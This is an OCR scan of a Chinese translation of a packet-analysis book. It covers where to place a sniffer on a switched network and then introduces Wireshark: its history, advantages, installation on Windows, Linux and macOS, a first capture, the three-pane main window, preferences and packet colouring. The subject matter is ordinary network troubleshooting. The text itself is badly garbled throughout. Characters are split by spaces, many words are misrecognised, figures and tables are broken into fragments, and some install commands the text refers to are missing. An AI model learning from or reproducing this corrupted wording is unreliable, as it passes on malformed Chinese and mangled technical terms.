的 路 由 需 钳 误 地 路 由 了 。 


ml 
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图 2-14 网 络 D 中 的 计算 机 不 能 与 网 络 A 中 的 计算 机 进行 通信 
最 终 ， 这 会 导致 路 由 器 配置 问题 ， 如 果 得 到 纠正 ， 那 么 便 会 解决 掉 
你 的 大 麻烦 。 虽 然 这 个 场景 有 点 宽泛 ， 但 其 中 的 精 体 是 ， 在 处 理 涉及 多 
个 网 段 与 路 由 器 的 问题 时 ， 可 能 需要 将 你 的 嗅 探 器 移动 到 不 同 的 位 置 
上 ， 才 能 获得 一 个 完整 的 网 络 画面 。 


这 是 一 个 很 好 的 例子 ， 它 说 明了 为 什么 往往 需要 在 个 同 的 网 段 中 对 
多 个 设备 流量 进行 嗅 探 ， 才 能 很 快 地 诊断 出 故障 的 根本 诛 因 。 


| “了 网 络 地 图 ” 


在 关于 网 络 布局 的 讨论 中 ， 我 们 已 经 研究 了 好 几 种 不 同 的 “网 络 地 图 ”>。“ 网 络 地 图 ”， 或 
称 为 网 络 拓 扑 图 ， 是 一 个 显示 了 网 络 中 所 有 技术 资源 以 及 它们 之 间 连 接 关 系 的 图 形 表 示 。 





在 决定 你 的 数据 包 咒 探 如 安 置 位 置 时 ， 没 有 比 拿 厦 一 张 “网 络 地 图 ”来 进行 分 析 更 好 的 办 
法 了。 如果 你 有 一 张 “网 络 地 图 *”， 请 把 它 保留 在 手边 ， 它 在 故障 排除 和 分 析 过 程 中 ， 部 会 是 
一 份 宝 贯 的 资产 。 建 议 对 你 目 己 的 网 络 画 出 一 份 详细 的 “网 络 地 图 ”。 请 记 住 在 大 多 数 时 候 ， 





排除 故障 一 半 以 上 的 工作 ， 部 集中 在 收集 正确 的 网 络 数据 上 。 





2.5 部 普 噢 探 左 的 实践 指南 


我 们 已 经 介绍 了 在 交换 式 网 络 中 捕获 网 络 法 量 的 4 种 不 同方 法 。 我 
们 可 以 再 增加 一 种 方式 ， 适 用 于 我 们 仪 仅 在 蛙 个 系统 上 安 究 咒 探 如 软件 
并 监听 这 人 台 系 统 演 入 流出 的 流量 。 在 东 个 特定 场景 中 ， 你 可 能 不 太 容 易 
确定 应 访 用 上 述 这 5 种 方法 中 的 哪 种 才 是 最 合适 的 。 表 2-2 提 供 了 每 种 部 
普 方 法 的 通用 准则 。 


作为 分 析 师 ， 我 们 需要 尺 可 能 地 隐 殴 。 最 理想 的 境界 古 ， 我 们 采集 
项 要 的 数据 ， 而 不 留 下 任何 的 脚印 。 这 就 像 是 法 医 在 调 合 时 不 想 对 犯 排 
现场 造成 任何 破坏 。 我 们 也 不 希望 破坏 捕获 的 网 络 流量 。 


表 2-2 在 交换 式 网 络 环境 中 进行 数据 包 嘿 探 的 指导 准则 


ee 
包 。 

e 可 以 在 不 让 客户 问 脱 机 下 线 的 情况 下 进行 配置 ， 非 常 便于 镜像 路 由 占 或 者 
服务 磺 问 口 。 








e 当 你 不 需要 考虑 主机 暂时 下 线 带 来 的 后 果 时 适用 。 

e 当 你 需要 响 探 光纤 通信 时 ， 这 是 唯一 选项 。 

e 由 于 网 络 分 流 莫 束 是 为 了 网 络 监 昕 咒 探 而 设计 的 ， 而 且 能 够 跟 上 现代 网 络 
速度 ， 因 此 这 种 方法 比 起 集 线 需 输出 要 更 优 一 些 。 

e 在 预算 紧张 时 ， 这 种 方法 的 成 本 会 过 于 局 郧 。 








。 这 会 被 认为 是 非常 草率 的 ， 因 为 它 涉及 网 络 上 注入 数据 包 ， 并 通过 重 路 由 
网 络 流量 流 经 你 的 嗅 探 器 。 

。 在 你 需要 一 个 暂时 性 快速 实施 的 方法 ， 能 够 将 一 个 设备 的 网 络 流量 进行 捕 
获 ， 而 又 不 用 将 其 下 线 ， 同 时 端口 镜像 又 不 被 支持 的 时 候 ， 这 种 方法 会 是 一 
个 高 效 的 选择 。 








e 一 般 不 建议 ， 因 为 如 条 一 全 主机 存在 故障 和 问题 ， 这 个 问题 可 能 会 导致 数 
直接 | 据 包 被 丢 莽 ,或 是 被 配置 成 它们 无 法 被 准确 展示 的 样子 。 
e 主机 的 网 卡 不 需要 设置 在 混杂 模式 。 


安装 je 在 进行 环境 测试 、 评 信和 审 碍 性 能 ， 或 是 检查 在 其 他 地 方 捕获 的 数据 包 文 
件 时 ， 这 和 是 最 佳 方案 。 





当 在 后 面 划 市 中 未 步 面 对 一 些 实际 场景 时 ， 我 们 将 会 对 逐个 采 例 进 
行 详细 分 析 ， 来 讨论 捕获 数据 最 好 的 方式 。 目 前 来 说， 我 们 在 图 2-15 中 
给 出 的 流程 图 应 该 能 够 帮助 你 决定 用 来 捕获 流量 的 最 佳 方法 。 请 记 住 ， 
这 个 沉 程 图 只 是 一 个 简单 的 通用 参考 ， 并 不 涵 兰 所 有 用 来 监听 网 络 线路 


的 可 能 方法 。 













监控 还 是 ~ 
保持 高 吞吐 量 ? 








7 你 的 变换 机 是 窜 





使 用 端口 镜像 是 









A 你 有 一 个 网 络 
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图 2-15 ”帮助 确定 哪 种 是 最 适用 网 络 监听 方法 的 流程 图 


第 3 音 ”Wireshark 入门 





在 第 1 章 中 ， 我 们 介绍 了 几 种 可 以 进行 网 络 分 析 的 数据 包 嘿 探 工具 
但 在 这 本 书 中 我 们 将 只 使 用 Wireshark， 并 在 此 章 进 行 简要 的 介 
sp 


3.1 Wireshark 倍 史 


Wireshark 的 历史 相当 久远 丰 蝇 ， 其 最 初 的 版 本 叫 作 Ethereal， 由 毕 
业 于 黎 苏 里 大 学 霸 院 斯 城 分 校 计 算 机 科学 专业 的 Gerald Combs 出 于 项 目 
需要 而 开发 ， 并 于 1998 年 以 GNU Public Licence(GPL) 开 源 许可 证 发 布 。 


在 Ethereal 发 布 八 年 之 后 ，Combs 嫩 职 并 男 谋 高 束 ， 但 是 在 那个 时 候 
他 的 雇主 公司 擎 握 独 Ethereal 的 商标 权 ， 而 Combs 也 没 能 和 其 雇主 驶 取得 
Ethereal 商 标 达 成 协议 。 于 是 Combs 和 整个 开发 团队 在 2006 年 年 中 的 时 候 
将 这 个 项 目 重 新 冠 名 为 Wireshark。 


Wireshark 随 后 迅速 地 取得 了 大 众 的 青睐 ， 而 其 合作 开发 团队 也 壮大 
到 500 人 以 上 ， 然 而 Ethereal 项 目 却 再 没有 前 进 过 一 步 


3.2 ”Wireshark 失 优点 


Wireshark 在 日 第 应 用 中 具有 许多 优点 ， 无 论 你 是 初学 者 还 是 数据 包 
分 析 专 家 ，Wireshark 都 能 通过 丰 遇 的 功能 来 满足 你 的 需要 。 在 第 1 章 


中 ， 我 们 为 挑选 数据 包 呈 探 工具 提出 过 一 些 重要 的 判断 特征 ， 让 我 们 来 
检 奏 一 下 Wireshark 是 否 具 有 这 些 特征 。 
文 持 的 协议 : Wireshark 在 文 持 协议 的 数量 方面 是 出 类 拔 鞭 的 
于 本 书 稚 稿 时 Wireshark 已 提供 了 超过 1000 种 协议 的 文 持 。 这 些 协 议 从 最 
基础 的 卫 协 议和 DHCP 协 议 到 高 级 的 专用 协议 ， 比 如 DNP3 和 了 BitTorrent 
等 。 由 于 Wireshark 是 在 开源 模式 下 进行 开发 的 ， 因 此 每 次 更 新 都 会 增加 
一 些 对 新 协议 的 文 持 。 


| 注 志 晴天 时 时 时 时 时 时 


在 一 些 特 殊 情 况 下 ， 如 果 Wireshark 并 不 文 持 你 所 需要 的 协议 ， 那 么 你 还 可 以 目 己 编写 代 
人 查 提供 相应 的 支持 ， 并 提供 给 Wirshark 的 开发 者 ， 以 便 他 们 考虑 是 佣 将 之 包 合 在 以 后 的 版 本 
中 。 你 可 以 在 Wireshark 的 项 目 网 站 上 找到 更 多 的 相应 信息 。 














用 户 友 好 度 : Wireshark 的 界面 是 数据 包 咒 探 工 具 中 一 种 很 容易 理 
解 的 界面 。 它 基于 GUI， 并 提供 了 清晰 的 菜 早 栏 和 简明 的 布局 。 为 了 增 
强 实 用 性 ， 它 还 提供 了 类 似 于 不 同 协 议 的 彩色 融 宫 ， 以 及 通过 图 形 展示 
原始 数据 细节 等 不 同 功 能 。 与 类 似 于 Tcpdump 使 用 复杂 命令 行 的 那些 数 
据 包 唱 探 工具 相 比 ，Wireshark 的 图 形 化 界面 对 于 那些 数据 包 分 析 的 初学 
者 而 言 ， 古 十 分 方便 的 。 

价格 : 由 于 Wireshark 是 开源 的 ， 因 此 它 在 价格 上 面 是 无 以 匹敌 
的 。Wireshark 是 齐 循 GPL 协议 有 发 布 的 目 由 软件 ， 任 何人 无 论 出 于 私人 还 


是 商业 目的 ， 都 可 以 下 载 并 且 使 用 。 
§ 注意 时 是 时时 时 攻 攻 时 
虽然 Wireshark 是 免费 的 ， 但 是 仍然 会 有 一 些 人 不 小 心 去 “付费 ”购买 它 。 如 果 在 eBay 搜 


索 “ 数 据 包 曝 探 ”"， 你 会 慰 讶 地 友 现 会 有 如 此 多 的 人 想 以 $39.95 的 跳楼 价 问 你 出 售 Wireshark 
的 “专业 企业 级 许可 证 *”。 显 而 易 见 ， 这 些 痢 是 骗 人 的 把 戏 。 但 是 如 果 你 执意 想 要 购买 这 些 所 














请 的 “许可 证 *"”， 不 如 给 我 打 个 电话 ， 我 正好 有 些 肯 塔 基 的 海边 别 旱 要 以 跳楼 价 出 售 。" 





软件 支持 : 一 个 软件 的 成 败 取 雇 于 其 后 期 文 持 的 好 坏 。 虽 然 像 
Wireshark 这 样 目 由 分 发 的 软件 很 少 会 有 官方 正式 的 支持 ， 它 依赖 于 开源 
社区 的 用 户 群 提供 帮助 。 但 对 运 的 古 ，Wireshark 社 区 是 最 活跃 的 开源 项 

目 社 区 之 一 。Wireshark 网 站 上 给 出 了 很 多 种 软件 帮助 的 相关 链接 ， 包 括 
在 线 文档 、 支 持 与 开发 wiki、FAQ。 很 多 顶尖 的 开发 者 也 都 注册 并 关注 


着 Wireshark 上 的 邮件 列表 。Riverbed Technology 也 提供 了 对 Wireshark 的 付 
组 文 持 。 


源码 访问 : 因为 Wireshark 是 开源 软件 ， 所 以 你 可 以 在 任何 时 间 访 
问 到 其 源码 。 这 对 查找 程序 的 Bug、 理 解 协 议 解 释 器 的 工作 原理 或 自己 
页 献 代 码 都 有 很 大 帮助 。 


支持 的 操作 系统 : Wireshark 对 主流 的 操作 系统 都 提供 了 支持 ， 其 
中 包括 Windows、Mac OS X 以 及 基于 Linux 的 系统 。 你 可 以 在 Wireshark 
的 主页 上 查询 所 有 Wireshark 支 持 的 操作 系统 列表 。 


3.3 ”安装 Wireshark 


Wireshark 的 安装 过 程 极其 简单 ， 但 在 安装 之 前 要 确保 你 的 机 器 满足 
如 下 要 求 。 


。 任意 新 型 的 32 位 或 64 位 CPU。 

。 至 少 400MB 可 用 内 存 (主要 为 了 大 型 流量 文件 ) 。 

。 至 少 300MB 的 可 用 存储 空间 〈 不 包括 捕获 的 流量 文件 ) 。 
e。 文 持 混杂 模式 的 网 卡 。 

。 WinPcap 或 libpcap 驱 动 。 


WinPcap 驱 动 是 Windows 对 于 pcap 数 据 包 捕获 的 通用 程序 接口 
(API) 的 实现 ， 人 简单 来 说 束 是 这 个 驱动 能 够 通过 操作 系统 捕捉 原始 数 
据 包 、 应 用 过 滤 左 ， 并 能 够 让 网 卡 切 入 或 切 出 混杂 模式 。 

虽然 你 也 可 以 单独 下 载 安 装 WinPcap， 但 一 般 最 好 使 用 Wireshark 安 


涛 包 中 的 WinPcap。 因 为 这 个 版 本 的 WinPcap 经 过 测试 ， 能 够 和 
Wireshark 一 起 工作 。 


3.3.1 在 做 软 Windows 系 统 中 安装 


通过 测试 的 当前 Wireshark 版 本 ， 能 够 在 微软 仍 维护 的 Windows 操 作 
系统 上 运行 ， 于 本 书 截 稿 时 包括 Windows Vista、Windows 7、Windows 
8、Windows 10 和 Windows Servers 2003/2008/2012。 虽然 Wireshark 也 


可 以 在 一 些 其 他 版 本 的 Windows 中 运行 〈 比 如 Windows XP) ， 但 这 些 
版 本 不 被 官方 文 持 。 


在 Windows 中 安装 Wireshark 的 第 一 步 就 是 在 Wireshark 的 官方 网 站 上 
找到 Download 页 面 ， 并 选择 一 个 镜像 站 所 下 载 最 新 版 的 安 委 包 。 在 下 载 
好 安装 包 之 后 ， 齐 照 如 下 步骤 实 装 。 


(1) 双击 .exe 文 件 开始 进行 安 泌 ， 在 介绍 页 面 上 单 击 Next。 
(2) 阅读 许可 证 条 藉 ， 如 果 同 意 接 受 此 条 蒜 ， 蛙 击 I Agree。 


(3) 选择 你 希望 安装 的 Wireshark 组 件 ， 如 图 3-1 所 示 。 在 本 书 中 接 
受 默 认 设 置 即 可 ， 然 后 单 击 Next。 


a Wireshark 2,.2,.3 [64-bit} $etup 


Choose Compoments 
Choose which features of Wireshark 2,2,3 (84-bit) you want to install, 


由 -加 Plugins & Extensions 
由 :图 Tools 


DeEscripton 


Space required: 171.0MB Position wour mouse over a component to see its 
description, 


‘wireshark Installer ttrmy - 





本 要 
图 3-1 选择 你 想 要 安装 的 Wireshark 组 件 
(4) 在 Aditional Tasks 窗 口中 单 击 Next。 
(5) 选择 Wireshark 的 安装 位 置 并 单 击 Next。 
(6) 当 弹 出 是 否 需 要 安装 WinPcap 的 对 话 框 时 ， 务 必 确 保 Install 


WinPcap 选 项 已 修 色 选 ， 如 图 3-2 所 示 ， 然 后 单 击 Install。 和 安装 过 程 便 会 
随即 开始 。 


a Wireshark 2,.2.3 (64-bit} $etup 一 


Install WinPcap? 
WinPcap is reguired to capture live network data, Should WinPcap be installed? 大 








Currenty installed WinPcap version 


minpeap is currently not installed 


{Use AddiRemove Programs first to uninstall any undetected old WinPcap versions) 


Whatis WinPcap? 























图 3-2 ”将 安装 WinPcap 驱 动 的 选项 选中 


(7) Wireshark 的 安 闻 过 程 进行 了 六 约 一 半 的 时 候 ， 会 开始 安 靖 
WinPcap。 在 介绍 页 面 单 击 Next 之 后 ， 请 阅读 许可 协议 并 单 击 I Agree。 


(8) 你 将 选择 是 否 安装 USBPcap 选 项 。 这 是 一 个 从 USB 设 备 中 收 
集 数 据 的 工具 。 色 选 你 想 要 的 复 选 框 并 单 击 Next。 


(9) WinPcap 和 USBPcap 〈 如 果 你 在 上 一 步 义 选 了 的 话 ) 应 该 已 经 
安 疼 到 你 的 计算 机 上 了 ， 在 安 半 完成 之 后 ， 单 击 Finish。 


(10) Wireshark 应 该 已 经 安装 到 你 的 计算 机 上 上 了， 在 安装 完成 之 
后 ， 单 击 Finish 。 


(11) 在 安装 确认 界面 中 ， 早 击 Finish。 


3.3.2 ”在 Linux 系 统 中 安装 


Wireshark 可 以 在 大 部 分 基于 UNIX 的 系统 中 运行 。 你 可 以 通过 系统 
包 管理 器 下 载 ， 并 安装 针对 你 的 系统 所 适用 的 发 行 版 本 。 我 们 在 这 里 只 
介绍 几 个 常见 的 Linux 发 行 版 本 的 安装 步骤 。 


一 般 来 说 ， 如 来 作为 系统 软件 安 容 ， 你 需要 上 其 有 root 权 限 ; 但 如 来 


你 通过 编译 源 代 码 安 闭 成 为 本 地 软件 ， 那 么 通常 束 不 需要 root 权 限 了 。 
1. 基于 RPM 的 系统 


对 于 类 似 红 帽 Linux(Red Hat Linux) 等 使 用 RPM 的 Linux 发 行 版 ， 比 
如 CentOS， 很 可 能 系统 默认 安装 了 Yum 包 管理 器 。 如 果 是 这 样 的 话 ， 
你 可 以 从 友 行 版 本 的 软件 源 中 获取 并 快速 安装 Wireshark。 你 雷 要 做 的 是 
打开 一 个 控制 台 窗 口 ， 并 输入 以 下 命令 : 

如 果 需 要 依赖 组 件 ， 那 么 你 将 通过 提示 来 安装 它们 。 如 果 一 切 成 功 
执行 ， 你 将 可 以 使 用 命令 行 启动 它 并 通过 GUI 来 操作 它 。 
2. 基于 DEB 的 系统 


对 于 类 似 于 Debian 和 Ubuntu 等 使 用 DEB 的 Linux 发 行 版 ， 你 可 以 使 
用 APT 包 管 理工 具 安 装 Wireshark。 要 从 系统 软件 源 中 安装 Wireshark， 
可 打开 一 个 控制 台 窗 口 并 键入 如 下 命令 : 


$ sudo apt-get install wireshark wireshark-dqt 


如 条 需要 依赖 组 件 ， 那 么 你 将 通过 提示 来 安 朗 它们 。 
3. 使 用 源 代 公 编 译 


因为 操作 系统 架构 和 Wireshark 功能 的 改变 ， 所 以 从 源码 安装 的 方 
法 可 能 也 会 随 之 变化 ， 这 也 是 建议 从 系统 包 官 理 右 安装 的 一 个 原因 。 然 
而 ， 如 果 你 的 Linux 发 行 版 没有 目 动 安装 包 管 理工 具 ， 那 么 安 少 
Wireshark 的 一 种 高 效 的 方法 束 是 使 用 源 代 人 码 编 详 。 下 面 的 步骤 给 出 了 安 


方太 
(1) 从 Wireshark 网 站 下 载 源 代码 包 。 
(2) 键入 下 面 的 命令 将 压缩 包 解 压 〈 将 文件 名 和 蔡 换 成 你 所 下 载 的 


源 代码 包 的 名 称 ) : 


(3) 在 安装 和 设置 Wireshark 之 而 ， 可 能 需要 安装 一 些 依赖 组 件 。 
比如 ，Ubuntu 14.04 需 要 一 些 额 外 的 软件 包 才 能 让 Wireshark 工作 。 这 些 
依赖 组 件 可 以 用 以 下 的 命令 进行 安装 《你 可 能 需要 使 用 root 权 限 ， 你 可 
以 在 命令 前 面 添加 sudo ) : 


$ sudo apt-get install pkg-config bison flex qt5-default libgtk-3-dev 





libpcap-dev qttools5-dev-tools 


(4) 进入 解压 缩 后 创建 的 文件 严 。 


(5) root 级 别 的 用 户 使 用 ./configure 命 令 配 置 源 代码 以 便于 其 能 
遇 编 译 。 如 果 你 不 想 使 用 默认 的 设置 ， 那 么 你 可 以 在 这 时 指定 安装 选 
项 ; 如 果 缺 少 相 关 软 件 支 持 ， 那 么 你 应 该 会 得 到 相关 错误 信息 ; 如 果 安 
冯 成 功 了 ， 那 么 你 应 该 可 以 得 到 成 功 担 示 ， 如 图 3-3 所 示 。 


号 2. sanders@sanders-dev: ~Awireshark-2.0.0 (ssh) 
The Wireshark package has been configured with the following options . 
Build wireshark : yes with wt Ss) 
Build wireshark-gtk : yes {with GTK+ 3) 
Build tshark : Yes 
Build tfshark : no 
Build capinfos : Yes 
Build captype : yas 
Build editcap : Yas 
Build dumpcap : Yas 
Build mergecap : yes 
Build reordercap : Yes 
Build text2pcap : Yes 
Build randpkt : 
Build dfteast : 
Build rawshark : 
Build androiddump : 
Build echld : 


Save files as pcap-ing by default : 
Install dumpcap With capabilitias : 
Install dumpcap Setuid : 


Use dumpcap group : 

Use plugins : 

Use external capture sources : 
Use Lua library : 

Build Qt RTP playear : 
Build GTR+ RTP player : 
Build profile binaries : 
Use peap library : 

Use z1ib library : 

Use kaerberos library : 

Use c-ares library : 

Use GNU ADNS library : 

Use SMI MIB library : 

Use GNU crypto library : 
Use SSL crypto library : 
Use IPVvE name Fesolution : 
Use gnutls library : 

Use POSIX tapabilities library : 
Use GeorIp library : 

Use nl library : 

Use SEC codec library : 





图 3-3 ”由 ./configure 命 令 得 到 的 成 功 输出 
(6) 键入 make 命 令 将 源 代码 编译 成 二 进 制 文件 。 
(7) 使 用 sudo make install 命 令 完成 最 后 的 安装 
(8) 运行 sudo/sbin/ldconfig 来 结束 安装 。 
-一 


如 条 你 按照 以 上 步骤 操作 时 出 现 了 错误 ， 那 么 你 可 能 需要 安 竣 额外 的 软件 包 





3.3.3 ”在 Mac OS X 系 统 中 安装 


在 OS X 系 统 中 安装 Wireshark， 请 依照 以 下 步 邓 操作。 


(1) 从 Wireshark 网 站 上 下 载 针 对 Mac OS X 系统 的 软件 包 。 


(2) 运行 安放 程序 并 找 照 指 导 依次 安装 。 只 有 接受 了 用 己 使 用 许 
可 规定 ， 你 才能 继续 安 北 。 


(3) 完成 安装 指引 。 
3.4 “Wireshark 杞 步 入 门 


在 成 功 地 在 系统 中 装 好 了 Wireshark 之 后 ， 你 就 可 以 开始 学 习 使 用 它 
a 会 发 现 你 什么 者 
\、 风 ! 


好 吧 ，Wireshark 在 刚 打 开 的 时 候 确 实 不 太 好 玩 ， 只 有 在 拿 到 一 些 数 
据 之 后 事情 才 会 变 得 有 趣 起 来 。 


3.4.1 第 一 识 捕 犹 数 据 包 


为 了 能 让 Wireshatk 得 到 一 些 数 据 包 ， 你 可 以 开始 第 一 次 数据 包 捕 获 
实验 了。 你 可 能 会 想 :“ 当 网 络 什么 问题 也 没有 的 时 候 ， 怎 么 能 捕获 数 
据 包 呢 ? ” 


第 一 ， 网 络 总 是 有 问题 的 。 如 末 你 不 相信 ， 那 么 请 给 你 网 络 上 上 所 有 
的 用 尸 肥 一 封 邮件 ， 告 诉 他 们 一 切 部 工作 得 非常 好 。 


第 二 ， 数 据 包 分 析 并 不 一 定 要 等 到 有 问题 的 时 候 再 做 。 事 实 上 ， 大 
多 数 的 数据 包 分 析 员 在 分 析 没 有 问题 的 网 络 流量 上 和 花费 的 时 间 要 比 解决 
问题 的 时 间 多 。 为 了 能 高 效 地 解决 网 络 问题 ， 你 也 同样 需要 得 到 一 个 基 
准 来 与 之 对 比 。 举 例 来 说， 如 果 你 想 通 过 分 析 网 络 流 量 来 解决 关于 
Se lua 那么 你 至 少 需 要 知道 DHCP 在 正常 工作 时 的 数据 流 是 什 
人 JJ 。 


更 广泛 地 讲 ， 为 了 能 够 及 现 日 前 网 络 活动 的 卉 顺 ， 你 必须 对 日 关 网 
络 活动 的 情况 有 所 和 擎 握 。 当 你 的 网 络 正 稼 运行 时 ， 以 此 作为 基准 ， 隋 能 
知道 网 络 流量 在 正常 情况 下 的 样子 。 


内 言 少 哲 ， 让 我 们 来 捕获 一 些 数据 包 吧 ! 
(1) 打开 Wireshark。 
(2) 从 主 下 拉 有 来 单 中 选择 Capture， 然 后 是 Interface。 


这 时 你 应 该 可 以 看 到 一 个 对 话 框 ， 里 面 列 出 了 你 可 以 用 来 捕获 数据 
包 的 各 种 设备 ， 以 及 它们 的 下 地 址 。 


(3) 选择 你 想 要 使 用 的 设备 ， 如 图 3-4 所 示 ， 然 后 单 击 Start， 或 者 
直接 单 击 欢迎 画面 中 Interface List 下 的 某 一 个 设备 。 随 后 数据 束 会 在 窗 
口中 呈现 出 来 。 


磊 Wireshark . Capture Interfaces ? X 





Input Output Optiors 





Interface ~ Traffic Link-layer Header Promiscuous Snaplen (B) Buffer (MB) Capture Filter 
Bluetoot h Network Connection Ethernet nable | 
Eth t Ethernet abled default 2 
Eth 2 人 Ethernet nabled defaul 2 
Eth 3 A Ethernet nabled defaul 2 
Local Area Connec tion* 2 — .Ethernet nabled default 2 
Local Area Connection* 4 Ethernet nabled defaul 2 
USBPcap] USBPcap bled default 2 
USBPcap2 USBpcap bled defaul 2 
USBPcap3 USBPcap bled default 2 

“ [号 Ethernet nabled defaut 2 

Addresses: fe80::fLlee:89c:afdc:789d, 172.16.16.172 











Enable promiscuous mode on all interfaces 








Capture Filter for selected Interfaces: | Enter a capture filter ” | Compile BPFs 











图 3-4 ”选择 你 想 要 进行 数据 包 捕 获 的 关口 


(4) 等 上 ] min 左 右 ， 当 你 打算 俘 止 捕获 并 得 看 你 的 数据 的 时 候 ， 
在 Capture 的 下 拉 荣 单 中 单 击 Stop 按 钮 即 可 。 


当 你 做 完了 以 上 步骤 并 完成 了 数据 包 的 捕获 时 ，Wireshark 的 主 窗口 
中 应 该 已 经 呈现 了 相应 的 数据 ， 但 此 时 你 可 能 对 于 那些 数据 的 规模 感到 
头疼 ， 这 也 就 是 我 们 把 Wireshark 一 整 块 的 主 窗口 进行 拆 分 的 原因 。 


3.4.2 ”Wireshark 主 寄 口 


Wireshark 的 主 窗口 将 你 所 捕获 的 数据 包 拆 分 并 以 更 容易 使 人 理解 的 
方式 呈现 出 来 ， 它 也 将 是 你 花费 时 间 较 多 的 地 方 。 我 们 使 用 刚刚 捕获 的 
数据 包 来 介绍 一 下 Wireshark 的 主 窗 口 ， 如 图 3-5 所 示 。 


主 窗口 的 3 个 面板 之 则 有 着 互相 的 联系 。 如 果 和 希望 在 Packet Details 
面板 中 碍 看 一 个 单独 的 数据 包 的 具体 内 容 ， 那 么 你 必须 在 Packet List 面 
板 中 单 击 选 中 那个 数据 包 。 在 选中 了 数据 包 之 后 ， 你 可 以 在 Packet 
Details 面 板 中 选中 数据 包 的 某 个 字段 ， 从 而 在 Packet Bytes 面 板 中 查看 相 
应 字段 的 字 节 信息 。 


BE 


图 3-5 中 的 Packet List 面 板 中 列 出 了 几 种 不 同 的 协议 ， 但 这 里 并 没有 使 用 不 同 的 层次 来 对 
不 同 的 协议 进行 视觉 上 的 区 分 ， 所 有 的 数据 包 都 是 按照 其 在 链 路 上 接收 到 的 顺序 排列 的 。 





Packet List 


Packet Details 








Packet Bytes 
Se ad Ume: 0:0.1 Profile: Oefault 


图 3-5 ”Wireshark 主 窗口 的 设计 使 用 了 3 个 面板 
下 和 面 介绍 了 每 个 面板 的 内 容 。 


Packet List 数据 包 列 表 )〉 : 这 个 最 上 面 的 面板 用 表格 显示 了 当前 
捕获 文件 中 的 所 有 数据 包 ， 其 中 包括 了 数据 包 序 亏 、 数 据 包 航 捕获 时 的 
相对 时 间 、 数 据 包 的 源 地 址 和 目标 地 址 、 数 据 包 的 协议 以 及 在 数据 包 中 
找到 的 概况 信息 等 列 。 


BB 


当 文 中 提 到 流量 的 时 候 ， 我 通常 是 指 Packet List 面 板 中 所 有 呈现 出 来 的 数据 包 ， 而 当 特 
别 地 提 到 DNS 流量 时 ， 我 指 的 是 Packet List 面 板 中 DNS 协议 的 数据 包 。 





Packet Details (数据 包 细节 ) ; 这 个 中 则 的 面板 分 层次 地 显示 了 


一 个 数据 包 中 的 内 容 ， 并 且 可 以 通过 展开 或 是 收缩 来 显示 这 个 数据 包 中 
所 捕获 到 的 全 部 内 容 。 


Packet Bytes 数据 包 字 市 ); 这 个 最 下 面 的 面板 可 能 是 最 令 人 困 
惑 的 ， 因 为 它 显 示 了 一 个 数据 包 未 经 处 理 的 原始 样子 ， 也 就 是 其 在 链 路 
上 传播 时 的 样子 。 这 些 原 始 数 据 看 上 去 一 操 部 个 客服 而 且 个 容易 理解 。 


3.4.3 “Wireshark 首 选项 


Wireshark 提 供 一 些 首 选项 设 定 可 以 让 你 根据 需要 进行 定制 。 如 果 需 
要 议定 Wireshark 首 选项 ， 那 么 需要 在 主 下 拉 束 单 中 选择 Edit 并 单 击 
Preferences， 然 后 你 便 可 以 看 到 一 个 首选 项 的 对 话 框 ， 里 面 有 一 些 可 以 
定制 的 选项 ， 如 图 3-6 所 示 。 





Remember main window size and placement 
Open files in 
(®) The most recently used folder 





DO This folder: |C:Y\Wsers\Chris Sanders\Documents 


Show up to 


filter entries 
recen t files 


LL | confirm unsaved capture files 


LL] Mutomatically scroll packet details 
Packet detail scroll percentage: lo | 


Main toolbar style: |Iconsonly 


Language: |Use System setting 了 














图 3-6 ”你 可 以 使 用 Preferences 对 话 框 中 的 选项 目 定 义 Wireshark 的 配置 
Wireshark 首 选项 分 为 6 个 主要 部 分 ， 外 加 1 个 高 级 选项 。 


Appearance (外 观 ) : 这 些 选 项 决定 了 Wireshark 将 如 何 显示 数 
据 。 你 可 以 根据 个 人 喜好 对 大 多 数 选 项 进行 调整 ， 比 如 是 个 体 存 窗口 位 
置 、3 个 主要 窗口 的 布局 、 滚 动 条 的 摆 放 、Packet List 面 板 中 列 的 摆 放 、 
显示 捕获 数据 的 字体 、 前 景色 和 背景 色 等 。 


Capture 〈 捕 获 ) : 这 些 选 项 可 以 让 你 对 于 上 日 己 捕获 数据 包 的 方式 
进行 特殊 设 定 ， 比 如 你 默认 使 用 的 设备 、 是 否 默 认 使 用 混 林 模式 、 是 盏 
实时 更 新 Packet List 面 板 等 。 


Filter Expressions 〈 过 滤 需 表达 式 ) : 在 之 后 的 章节 里 我 们 将 探讨 
Wireshark 是 如 何 让 你 基于 设 定 标准 去 过 小 流量 的 。 这 个 部 分 中 的 选项 
可 以 让 你 生成 管理 这 些 过 小 占 。 


Name Resolutions 〈 和 名称 解 析 ) : 通过 这 些 设 定 ， 你 可 以 开局 
Wireshark 将 地 址 (包括 MAC、 网 络 以 及 传输 名 称 解 析 〉 解析 成 更 加 容 
易 分 辨 的 名 字 这 一 功能 ， 并 且 可 以 设 定 并 发 处 理 名 称 解析 请 求 的 最 大 数 
日 。 


Protocols (协议 ) : 这 个 部 分 中 的 选项 可 以 让 你 调整 关于 捕捉 和 显 
示 各 种 Wireshatk 解 公 数 据 包 的 功能 。 虽 然 并 不 是 针对 每 一 个 协议 都 可 以 
进行 调整 ， 但 是 有 一 些 协议 的 选项 可 以 进行 更 改 。 除 非 你 有 特殊 的 原因 
去 修改 这 些 选 项 ， 人 否则 最 好 保持 它们 的 默认 值 。 


Statistics 《统计 ) : 这 一 部 分 提供 了 Wireshark 中 统计 功能 的 设 定 选 
项 。 在 第 5 章节 我 们 会 对 之 进行 更 深入 的 学 习 。 


Advanced 局 级 ) : 在 以 上 6 个 部 分 中 没有 做 的 设置 会 被 归 基 到 这 
里 。 通 常 这 些 设置 只 有 Wireshark 的 高 级 用 户 才 会 去 修改 。 


3.4.4 ”数据 包 彩 色 局 党 


如 果 你 像 我 一 样 豆 欢 五 闫 六 色 的 物体 ， 那 么 你 应 该 会 对 Packet List 
面板 中 那些 不 同 的 闫 色 感 到 兴奋 。 如 图 3-7 所 示 (虽然 图 示 是 黑 日 的 ， 
但 你 应 该 可 以 理解 的 ) ， 那 些 颜 色 看 上 去 就 像 是 随机 分 配给 每 一 个 数据 
包 的 ， 但 其 实 并 不 是 这 样 的 。 


27 1.807280 72 28 Pe a NBNS 92 Name ery NB ISATAP<00> 
28 2.557340 172-:16=16-128 R26 L62255 NBNS 92 Name query NB ISATAP<00> 
29 3.009402 T7216 L228 Wi DNS 86 standard query Oxb86a PTR 128.16.16.172. in-addr.arpa 
30 3.050866 ra 172.16.16.128 163 standard query response 0xb86a No such name 
